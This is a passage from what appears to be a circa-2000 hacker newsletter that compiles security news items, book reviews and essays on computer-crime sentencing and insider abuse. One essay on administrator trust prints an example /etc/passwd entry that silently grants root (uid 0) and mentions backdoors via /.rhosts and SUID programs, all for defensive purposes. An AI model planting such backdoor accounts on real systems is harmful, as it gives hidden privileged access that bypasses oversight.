said no search or arrest warrants had yet been issued in connection with the investigation. At the university, spokesman Bill Schlotter said a climate of academic freedom left facilities vulnerable. "We're a university, and you want the keep your system open for students and faculty, but you want it to be secure. How do you do both?" he asked. The wave of hacker attacks prompted little surprise in either the computer security industry or the hacker community. The attacks have relied on easy-to-find tools available over the Internet, and sites with poor security to use as their staging areas. Those "third party" sites are the ones -- not the large ones suffering the attacks -- that the FBI cited as the biggest security risks. "All these littler sites are worried about is getting their site up and then the Webmaster is in charge, and there is no attention paid at all to security," said one hacker, known as YTCracker, interviewed by Reuters. "Usually, it doesn't take anything to get in." @HWA 145.0 ISN: Who gets your trust? ~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN list Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? (3,000words) In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root: auser:x:0:101:Average User :/home/auser:/bin/ksh If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways though SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge. Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"? System monitoring Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges. What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it. What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to. Countermeasures You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee. Background checks You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught). The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area. In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance? Technical measures Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to. sudo The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description. Tripwire Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column. Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent? Professionalism The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior. During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as: No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator. All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient. Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify. Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential. The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately. Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing. All administrative procedures and tools are to be considered proprietary information and are the property of the computer center. Tape archives may not be removed from the facility without written approval. Discretion A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!) Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations. Final thoughts Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label. @HWA 146.0 ISN: Hackers demand 10 Million pounds from Visa ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UK Telegraph: http://www.telegraph.co.uk/et?ac=000114832908976&rtmo=quuqKJR9&atmo=99999999&pg=/et/00/1/18/nhack18.html Hackers demand £10m By Mark Ward COMPUTER hackers have demanded a £10 million ransom from Visa, the credit card giant, after claiming to have stolen critical data. Visa's British head office was contacted just before Christmas by a group which said it obtained the information during a hacking raid last summer. Visa refused to pay the ransom and contacted police. A Visa spokesman admitted the British-based hackers managed to penetrate its computer network last July but were detected almost immediately and only stole useless information. He said: "As fast as they were in they were found out. To our knowledge they've not been back in." Police are investigating and Scotland Yard is understood to have already talked to one suspect. @HWA 147.0 ISN: Cybercrime growing harder to prosecute ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek.milewski@us.pwcglobal.com http://www.ecommercetimes.com/news/articles2000/000121-nb1.shtml By Martin Stone, Newsbytes Special to the E-Commerce Times January 21, 2000 U.S. Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it. A report by Reuters today said Justice and FBI officials concede there is no such thing as a completely secure computer system. The warning was voiced Thursday at a conference on cybercrime sponsored by the Deloitte & Touche accounting firm, the report said. Who Is Vulnerable? "The issue isn't who is vulnerable because everyone is vulnerable. he issue is how are companies going to deal with those vulnerabilities," Reuters quoted Assistant U.S. Attorney Allison Burroughs as saying. The report noted that a recent survey found that 62 percent of U.S. companies reported security breaches in the last 12 months and that resulting financial damages totaled almost $124 million (US$). Computer criminals are harder to identify and have a greater reach than conventional criminals, Burroughs reportedly said, adding that prosecution of felons outside U.S. borders is complicated. Formidable Weapon Burroughs and FBI Agent Nenette Day warned that encryption, meant to protect company data, can become a formidable weapon for criminals wary of leaving electronic footprints, Reuters said. That statement comes after Attorney General Janet Reno in September said that the administration would work on making strong encryption exports easier for US high-tech companies, who traditionally have been hampered in their efforts to ship the products because of law enforcement concerns. The relaxed encryption regulations were announced on January 12th. Day reportedly told the conference there are large numbers of computer criminals working every day from home trying to defraud or otherwise damage corporations. She added that corporations are often reluctant to report computer intrusions, making investigations more difficult, the report stated. ISN is sponsored by Security-Focus.COM @HWA 148.0 ISN: Hacking Exposed (Review) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ amazon reviews: http://www.amazon.com/exec/obidos/ISBN=0072121270/insekurityorgA/ Hacking Exposed: Network Security Secrets & Solutions Stuart McClure, [4]Joel Scambray, [5]George Kurtz http://www.hackingexposed.com Paperback - 484 pages (September 1, 1999) McGraw-Hill ISBN: 0072121270 Since 1991, I have been involved in the security field in one way or another. Starting as a casual hobby and evolving into a career, it has been a predominat part of my life. In my spare time I have run a number of FTP archives, Web sites and participated in many mail lists. Because of this, many people seek me out for advice and answers. In all these years, the most frequently asked question of me has no simple answer. "How do I hack?" To date I have answered this with a wide variety of responses depending on how the question was asked, who asked it, and my general mood. Lucky for me, I now have a quick and dirty way out of what sometimes proved to be a three page response to the question. While I have always maintained (and still do) that hacking can not truly be taught, some aspects certainly can be. The technical steps behind computer intrusion can be shared by knowledgeable people, giving a solid foundation for the steps and procedures required in compromising the security of a system. That is the goal of this book, and it does it quite well. To those with a basic understanding of how computers and networks operate, this book will teach them the basiscs of remote system auditing (also known as controlled penetration). The book is divided into four main sections: Casing the Establishment, System Hacking, Network Hacking, and Software Hacking. Each section is further divided into seperate chapters which cover various methods of system intrusion on different platforms. By breaking it down and seperating information related to Unix and Windows NT, it adds clarity and avoids confusion between tools and techniques specific to a particular platform. In Casing the Establishment, you learn the fine art of remote reconnaissance of machines on a remote network. To a dedicated security auditer, remote machines can give away a world of information that aids them in subsequent attacks. Often times administrators are not aware of just how much information is shared out. The ability to pick this information out and use it to your advantage can often make the difference between gaining access and complete failure. System Hacking goes into the specific details of breaking into remote hosts. Covering Windows, Novell and Unix, the authors cover a wide variety of methods, many of which are lost to newcomers to security auditing. Readers learn the nuances of brute force attacks, buffer overflows, symlink attacks and a lot more. Network Hacking looks at the bigger picture and considers multiple machines as the intended target. Covering dial-ups, Virtual Private Networks (VPNs), routers and more, these chapters aim to hit the critical infrastructure of many networks. Another critical appliance in any sensitive network is the Firewall. The final chapter in this section gives several ways to poke holes in the firewall so that it no longer acts as a complete dead end for you. Software Hacking delves into details of Denial of Service (DoS) attacks, remote access software, and advanced techniques. With more and more corporations using remote access software, they are finding it is leaving them wide open to attacks. These software packages are often a security auditers dream. To everyone who has ever asked me 'how to hack', or anything to do with system penetration, start with this book. Read it cover to cover and you will save yourself a lot of time and effot otherwise wasted with search engines and outdated text files. review by: Brian Martin ISN is sponsored by Security-Focus.COM @HWA 149.0 ISN: The crime of punishment by Brian Martin ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Synthesis http://www.thesynthesis.com/tech/crimepunishment/index.html As you read this, an unusual legal case history is being established around the prosecution of computer crime. Because computer crime is still a relatively new aspect in the arena of law and prosecution, each and every case sets important precedent that will be called on in upcoming cases. The growing concern by many people seems to be the drastic nature of punishments being levied against computer intrusions. Not only are the punishments not seeming to fit the crime, there is little consistency in the legal system's application of punishment to these people. Previous articles have pointed out the disturbing trends in damage figures which directly affect sentencing in these cases. Unfortunately, the emerging problem seems to go well beyond suspicious damage figures. It is difficult to say exactly why the punishment for computer crime is so severe. Some people speculate it is the public perception of hacking and the FUD (Fear, Uncertainty and Doubt) surrounding it while some think it is nothing more than sacrificial lambs taking the brunt of public outcry. Others feel it can't be logically explained. I think the best answer is that computer crime is still shocking society, which overreacts in response. The immediate disparity can be seen when comparing the sentencing between computer and non-computer crimes. While more traditional and material crimes like assault, burglary and murder are receiving what seems like light sentences, computer crime convicts are becoming the bearers of exceptionally stiff and smothering sentences. Not only are the prison sentences extraordinarily lengthy, the terms of probation are baffling and rough. Instead of a probation that encourages reform and nurtures a good life better than the previous life of crime, it thrusts the convicted into a life of poverty and despair. Jail Time Shortly after the new year, I was watching the news in a New York hotel and caught the follow-up of a story begun some two to three years prior. The news went on to say that a 21-year-old man convicted of killing his baby was being released after two years of prison. He and his wife and killed their infant some three years age, and his prison term was two years. Surely this is one case that slipped through our justice system and let these killers off easy? A quick search yields that this is not necessarily uncommon. Patrick Jack served a two-year sentence for manslaughter after stabbing Francis Sunjay Weber with a pair of scissors. Another article that discusses short sentences mentions yet another case in which a 17-year-old Marysville girl was shot and killed. Her killer was in turn sentenced to 27 months in prison for his crime. These cases make me wonder about the effectiveness of our legal system. On the flip side, two recent computer crime cases perfectly illustrate the baffling seriousness and resulting prison time that now accompanies computer crime. Eric Burns recently pled guilty to ONE felony count of computer intrusion, and took the blame for the defacement of the White House web page. For his confessed crimes, he was sentenced to a $36,240 fine and 15 months in prison. A second longer story unfolded recently, telling us of a small group of hackers known as the Phone Masters who wielded amazing control of computers and phone networks. One of the individuals, Corey Lindsley, was sentenced to 41 months in prison for his 2 felony counts. The last comparison is the infamous Kevin Mitnick saga in which Mitnick spent a total of 5 years in jail and prison for what ended up being five felony counts of computer related crimes. What should be noted is the comparison of crimes. Burns' single felony is basically nothing more than high tech graffiti, a sort of digital spray paint on a federal building. What would that crime fetch for a sentence if done in the real world? Certainly not fifteen months of prison. Manslaughter can fetch as low as two years of prison time, while Lindsley and Mitnick sit in federal prison for four and five years respectively. This disparity is hard to believe considering the gruesome nature of manslaughter and killing a young baby as compared to altering the web page of an Internet web site. Conditions of Probation Even if you could dismiss the harsh penalty for relatively minor crimes, you would then face another practice that is becoming all too common with computer crime. After subjecting computer intruders to the long trial, large fines and lengthy jail terms, the real injustice occurs. It is not uncommon for people to be put on probation for one to five years for any felony conviction. I think it is fair to say that a probation term of two to three years is a sound average. Probation terms for most crimes are generally the same, preventing convicts from certain behavior and actions that are not appropriate. Some of these terms are not associating with known criminals, possessing weapons, use of drugs, and more. One thing about these terms are they tend to be generally the same with little variation based on crime. For those convicted of computer crime, the probation guidelines are quite different. A quick review of the terms and conditions of Kevin Mitnick's probation bring on a whole new set of computer crime specific terms: Absent prior express written approval from the Probation Officer, the Petitioner shall not possess or use, for any purpose, the following: 1. any computer hardware equipment; 2. any computer software programs; 3. modems; 4. any computer related peripheral or support equipment; 5. portable laptop computer, 'personal information assistants,' and derivatives; 6. cellular telephones; 7. televisions or other instruments of communication equipped with online, Internet, World-Wide Web or other computer network access; 8. any other electronic equipment, presently available or new technology that becomes available, that can be converted to or has as its function the ability to act as a computer system or to access a computer system, computer network or telecommunications network (except defendant may possess a 'land line' telephone); B. The defendant shall not be employed in or perform services for any entity engaged in the computer, computer software, or telecommunications business and shall not be employed in any capacity wherein he has access to computers or computer related equipment or software; C. The defendant shall not access computers, computer networks or other forms of wireless communications himself or through third parties; D. The defendant shall not act as a consultant or advisor to individuals or groups engaged in any computer related activity; E. The defendant shall not acquire or possess any computer codes (including computer passwords), cellular phone access codes or other access devices that enable the defendant to use, acquire, exchange or alter information in a computer or telecommunications database system; F. The defendant shall not use any data encryption device, program or technique for computers; G. The defendant shall not alter or possess any altered telephone, telephone equipment or any other communications related equipment. Reading these, one can begin to see how this limits a convicted computer intruder in life after prison. Some argue that as convicted felons, who cares? They are getting what they deserve. Perhaps that is true, but why don't murderers and rapists receive special terms for their probation that might be deemed appropriate? Some of the few crimes that receive no special terms? A.Forgery -- Convicted forgers are not banned from pens, paper and other devices that help commit the crime. B.Vehicular Manslaughter and other crimes involving motor vehicles -- These people do not lose their driver's license or the ability to own and operate cars or trucks. C.Sex Crimes – Except in extreme cases of recidivistic offenders, convicted rapists and pedophiles are not forbidden from pornography or other stimuli said to influence or encourage their behavior. D.Counterfeiting -- Convicted counterfeiters are not forbidden from using currency, nor forbidden from working jobs with cash or banned from a wide variety of activities that may influence them. The purpose of incarceration and the following probation is to punish and rehabilitate the convict. Probation specifically is geared to help push the criminal into a structured life without influences that may lead to their return to a life of crime. However, in the case of computer crime the probation guidelines do a lot more than discourage further computer crime. Some of the few acts they will be banned from: Sending a letter to a Senator via e-mail or using a word processor Playing a video arcade game or personal entertainment system like Sega or Nintendo Calling his family on a cellular telephone Working in any industry (including fast food) as they all rely on computers, even for cash transactions (cash registers) Working as a custodian in any business that has computers on premises Working as a teacher, instructor, consultant, or advisor to any company that owns or operates a single computer device Writing any type of computer software program (even using merely a pen and paper) Accessing a public library's computerized card catalog. Using computerized information services found at airports and shopping malls that give directions and customer information Accessing any information via phone and voice mail/prompt system (including bank account information, car insurance and more) Surprising as it seems, all of the above become illegal to most people on probation for computer crimes. Imagine living for three years with those restrictions hovering over you. Is this really a good guideline to get you back on the right track and lead a good life without bad influence? Or is this a well lit path encouraging you to break the terms of probation and risk more prison time? If you are thrust into society after a lengthy prison sentence, stripped of opportunity to work in the one field you previously excelled in, what options does that leave? Unable to work in most modern and computerized jobs, unable to work near computers, it leaves the convict with several years of difficult living at below poverty level. Hardly the rehabilitation that was intended or needed. The Tip of the Iceberg The story of Chris Lamprecht still remains in the depths of news sites. In 1995 Lamprecht was sentenced to a 70-month prison sentence for money laundering. He did not plead to or get convicted of any computer related crimes. Despite this, Federal Judge Sam Sparks imposed the same "no computer" probation on Lamprecht at the request of the District Attorney. This seems to be an equivalent of being banned from restaurants because you ate dinner before breaking and entering. Recouping Your Tax Dollars It is well established that those caught and convicted of any crime are subjected to restitution. The amount is typically arrived at by calculating the damage figures against the victim(s). If a bike worth one hundred dollars was stolen, the criminal could be ordered to pay restitution that included the cost of the bike, court fees the victim paid for, emotional distress, etc. One thing that has not historically been factored in is the cost of the investigation or the time and effort of the officers involved in solving the crime. Apparently the money associated with the law enforcement efforts was not a factor for one reason or another. Once again, when computer crime enters the equation, circumstances seem to change. In May of 1997, Wendell Dingus was sentenced by a federal court to six months of home monitoring for computer crime activity. Among the systems he admitted to attacking were the U.S. Air Force, NASA and Vanderbilt University. What is different about this case is the court's order for Dingus to repay $40,000 in restitution to the Air Force Information Warfare Center (AFIWC) for their time and effort in helping to track him. It is odd that the court systems are now levying punishments for computer crimes not based on the damage that was actually done, rather it is based on the amount of time, money and resources required to track down or fix the system's vulnerability. Worse, they are then lumping on time and resources required to (belatedly) create pro-active preventative measures from future intrusions, something that should have been done in the first place. So the system intruder is now responsible for future intrusions, yet the administrators were not in the first place? When the police or FBI catch up to a robber, defrauder or murderer, they are charged and punished for their crimes. It is generally unheard of for these criminals to receive punishments and fines based on the efforts of the law enforcement tracking them down. Think of how much time and resources the FBI put into tracking down a serial killer that has been roaming our country for years. How many air plane trips, car rentals, hotels, overtime, examination and forensic equipment, food reimbursement and who knows what else do our tax dollars go to pay for? Why aren't these levied against the criminal like they are now starting to do with computer crime? One difficult aspect that creeps back into computer crime cases is the blanket laws covering a wide variety of people and activities. As a computer crime investigator brought up in a conversation recently, a homicide typically affects a family, friends and perhaps a small community, while a concentrated computer attack could affect the lives of thousands of people or more. There are certainly exceptions to each type of crime but in general, that statement seems to be reasonable. The bottom line is that more consistency needs to be developed between traditional crimes and computer crimes. In Texas, it is a Class B misdemeanor for graffiti if the damage is less than $500. In reality, most Web page defacements done today can be recovered from and dealt with for less than $500. Anyone saying otherwise is likely to be the consultant profiting heavily at your expense. So why is it that a young kid who spray paints a wall gets hit with a small fine, and a young kid who spray paints a Web site gets fifteen months in jail and tens of thousands of dollars in fines? I think it is time for the media to quit hyping up computer crimes and introduce a dose of sanity to the Fear, Uncertainty and Doubt they love to bring to 'hacker' stories. The legal system needs to give a serious look at the disparity in how they handle various crimes. I think it is pretty obvious that something is wrong when a knife wielding murderer does less time than a keyboard wielding fourteen-year-old. @HWA 150.0 ISN: EDI Security, Control and, Audit (Book review) by Brian Martin ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ amazon reviews: http://www.amazon.com/exec/obidos/ISBN=0890066108/insekurityorgA/ http://www.attrition.org/library/rev/0890066108.html EDI Security, Control, and Audit Albert J. Marcella, Jr. and Sally Chan Artech ISBN: 0-89006-610-8 Electronic Data Interchange (EDI) is a computer-to-computer or application-to-application exchange of business information in a standard format. In 1992, there were over 31,000 known EDI users, with a steady increase since 1987. EDI users can be found in such industries as transportation, retail, grocery, automobiles, warehousing, pharmaceuticals, healthcare and financial institutions. "EDI will change our lives, just as computers did. It will redefine the ways we work as it pushes us toward a knowledge-based society in which we pursue intellectual challenges while routine, noncreative tasks are assigned to computers." - Gene A. Nelson As a comprehensive book on EDI, several parts of the book deal more with the operation and setup of such a network. This leads into the areas that explain in technical detail the security and auditing of EDI networks. Beginning with the basics of EDI, the book walks through the pros and cons of such networks. It gives guidelines for who should implement and use it, operating issues, risks, control concerns and more. These sections are brief and to the point, suitable to give to non technical managers who may be considering EDI as a solution. The following three chapters (2 - 4) delve into the technical aspects and the standards governing their development and operating procedures. Covering infrastructure and standards, networks and telecommunications, and cross-vulnerabilities in EDI Partnerships, these chapters give a solid understanding of the issues at hand. This reading is not suggested for the technical neophyte! Dropping back out of the technical jargon, Chapter 5 (Managing Interenterprise Partnerships) seems to be more suited toward managers and legal staff. The next chapter jumps back into technical land and covers Application Control Issues, Security/Environmental/Project controls, Inbound/Outbound Control Issues and more. Maintaining the ping-pong style of writing, Chapter 7 (EDI Management and Environmental Control) delves into higher level project and planning. If your organization uses EDI, or is considering implementing it, this book is for you. Both management and the technical staff can get something out of this book by passing it back and forth to read chapters. For a one stop shop on EDI, this is it. review by: Brian Martin ISN is sponsored by Security-Focus.COM @HWA 151.0 ISN: "Remember, some 'hackers' make house calls" ie:burglary. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [...So, your home machine and laptop is secure? Shimomura or Mitnick, DePayne, Tanner Zykl0n, aKt0r, JP and Zer0 kkk-c00l and all their friends couldn't get into it? what if the whole thing gets lifted? is your data safe and secure then? (backup and encrypt!) you think it doesn't happen? i've sat in an IRC channel with hackers talking about their planned heist(s) of equipment, it does happen and you best be prepared, it can happen to you. - Ed ..] http://www.techserver.com/noframes/story/0,2294,500163463-500206598-500944169-0,00.html NEW YORK (February 4, 2000 10:44 a.m. EST http://www.nandotimes.com) - Home computer users who think hacking is just a threat to government and corporate networks need to realize that the Internet puts them at risk of being invaded by computer predators, too, security experts say. Concern about home security grew Thursday following disclosure that former CIA Director John Deutch stored sensitive national security secrets on a home computer connected to the Internet. "He certainly should have known better," said Cormac Foster, who monitors security issues for Internet research firm Jupiter Communications. "If your business is protecting the security of the country, one would hope you wouldn't make a mistake like that." Elias Levy, chief technology officer for SecurityFocus.com, said hackers often target computers randomly, to obtain financial information or play a prank. But sometimes they access home machines from which they launch attacks on companies. "It comes down to people thinking, I don't have anything important on my computer, so why would somebody want to get me," Levy said. A hacker can gain access to a home computer in many ways. If a sharing option is turned on, outsiders could take advantage of that to delete or steal files. Through e-mail, hackers could send viruses and other malicious programs that will give them access to sensitive documents. The risks are greater with high-speed connections such as cable modems - those computers are always connected to the Internet. But even standard, dial-up users are vulnerable. Hackers have tools that can automatically scan the Web looking for computers with security holes. "If I'm a burglar, I have to rattle each door in the neighborhood until I find one that's unlocked," said Tom Powledge, senior product manager for Norton Internet Security software. A hacker with the right scanning tools "can rattle hundreds of doors at once." Once in, a hacker can seize control of the computer, even stealing credit card numbers or top-secret materials. CIA Director George Tenet said he has no evidence that foreign enemies hacked into Deutch's computer but acknowledged there is no way to tell for sure. ISN is sponsored by Security-Focus.COM @HWA 152.0 ISN Japanese Police crack down on hacker attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://ap.tbo.com/ap/breaking/MGIGU35UA4C.html Feb 5, 2000 - 01:33 AM TOKYO (AP) - With hackers barraging government Internet sites, Japanese police announced plans to improve crime-fighting in cyberspace, newspapers reported Saturday. Beginning late last month, unidentified hackers began a high-profile campaign to crack state sites. And despite its love for just about everything high-tech, Japan is far behind other countries when it comes to tackling online crime. The Yomiuri Shimbun, Japan's largest paper, said the National Police Agency has requested $1.78 million from the country's fiscal 2000 budget to battle the problem. Police want to study how hackers break into Web sites and ensure user names are not being abused, the reports said. Agency officials were unavailable for comment. Agency figures showed that 247 Internet crimes, including distributing child pornography, were reported in 1999, nearly double the previous year, according to major Japanese newspapers. A bill aimed at improving user verification, a so-called digital signature bill, is due to be submitted to parliament soon, the Asahi Shimbun reported. Digital signatures allow people to use the Internet to buy and sell goods and services, it said. The police agency is urging that mandatory identity checks on people who apply for such signatures be made part of the bill, the paper said. The proposed legislation comes on the heels of a new law parliament passed last summer to make it illegal to access sites without the proper clearance. It takes effect this month. The Bank of Japan - the country's central bank - the Defense Agency, the Science and Technology Agency and the Transport Ministry have all reported being attacked by hackers, though they reported no damage. However, hackers into the Science and Technology Agency's homepage left a message alleging that Tokyo denied the Rape of Nanking, the Japanese army's massacre of as many as 300,000 civilians during the 1937-38 occupation of the Chinese city now known as Nanjing. ISN is sponsored by Security-Focus.COM @HWA 153.0 ISN:Behind the scenes at "Hackers Inc." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Hax0rs Unlimited? heh - Ed) http://www.pcworld.com/pcwtoday/article/0,1510,15132,00.html So you thought hackers were nerds in dark rooms traveling in cyberspace to attack companies' computer systems or steal data. Think again. A new breed of hackers licensed to hack legally into companies around the world, ranging from banks in Israel and Britain to e-commerce companies in Spain, and check their systems' security, is at work in Sweden. The Stockholm-based private company Defcom, set up in April last year, is a pioneer in a shadowy business that may seem more like a scene from one of legendary American science fiction author William Gibson's novels than reality. But Defcom actually gets paid for hiring out its "ethical hackers" to large companies, mostly in the banking, insurance, and e-commerce sector around Europe. "Nine out of ten companies we're employed to check, we can break into through the Internet," Defcom Chief Executive Thomas Gullberg tells Reuters. "That's a frightening statistic." An Online Playground The Web is becoming an ever more attractive playground for hackers as e-commerce mushrooms in Europe and the United States, and sensitive data is transferred over the Internet. Hackers can break into practically any computer system if they want to, Defcom says. It was hard at first to bring hackers together, but Gullberg was surprised by the willingness on the part of hackers to turn legitimate. "We've brought hacking to another stage, made it ethical," Gullberg says. "We've gathered hackers under one roof. After all they're the best in the business, they know how it's done." Defocom's motto, displayed in one of the main hackers' rooms, sums it up: "It takes one to know one." The Swedish company--with an office in London--has grown to over 40 staff, of whom about half are professional hackers, aged 23 to 30. One has a criminal record. To boost expertise and knowledge it has also hired a police officer from the IT security division in Sweden's national crimes prevention unit. Once appointed by a company to check its security system, the staff carries out a technical analysis, then travels to the country of the company and starts hacking. What makes them different from some other data security firms is that they actually make changes in their customers' computers to see whether they can really be hacked into, Defcom says. "We don't just go to the firewall and prove that we can break it, but we go into the main computers," Defcom's senior cyberspace hacker, who asked to remain anonymous, tells Reuters. "We deliver the truth to clients. The bittersweet truth," Gullberg says. Bad for Business "Security has been a big problem in the business world and it still is. The Internet is not safe," Gullberg says. Most illegal hacking in finance centers on stealing credit card numbers but is expanding quickly into industrial espionage. Defcom says an underground market known as "information broker" sites is growing on the Web, where clients could scout around for hackers to do their dirty work, like breaking into a company to steal corporate data. The need for tighter security was underscored last month when hackers broke into online music retailer CD Universe, a unit of EUniverse and stole 300,000 credit card numbers, demanding payment of $100,000 not to use them. Defcom advises its clients not to publicize their use of its services as this could be a challenge to the hacking community. "It's easy to break into the system. Too easy. But often customers don't know when the companies have had intruders because they cover it up," the top hacker says. ISN is sponsored by Security-Focus.COM @HWA 154.0 ISN: Hackers a No-Show at DVD decryption protest (!???) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.digitalmass.com/columns/software/0207.html Hackers a no-show at protest over DVD decryption By Hiawatha Bray Special to boston.com The angry hackers never showed up -- not at their appointed meeting place at the Prudential Center food court, nor out in front of the Cheri Theater in downtown Boston, where I'd hoped to see them handing out their protest leaflets. Too bad; especially their not being at the Cheri. I'd have enjoyed the looks of bewilderment from the teens that stood three-deep, smoking illegal Marlboros as they waited for the start of Scream 3. Scarcely any of the kids would have had the slightest idea what the protest was about, and probably still wouldn't have understood, even after patient explanation. "You want to watch movies? Yeah, me too, man. On your computer? Cool ... Linux? What's that? And what's it got to do with movies, anyway?" Good question, but I doubt your average teen filmgoer would stay for an answer. They're probably not as insatiably curious as you guys. Many of you already know part of the story -- how the motion picture industry lit out after a network of Internet sites and a hacker hobbyist in Norway in an effort to stamp out a piece of software that allows unauthorized replays of DVD movie disks. I haven't bought a DVD player yet, but more than 5 million of you have. These devices replay Hollywood flicks with vastly better image and sound quality than old-fashioned videotape. DVD disks include 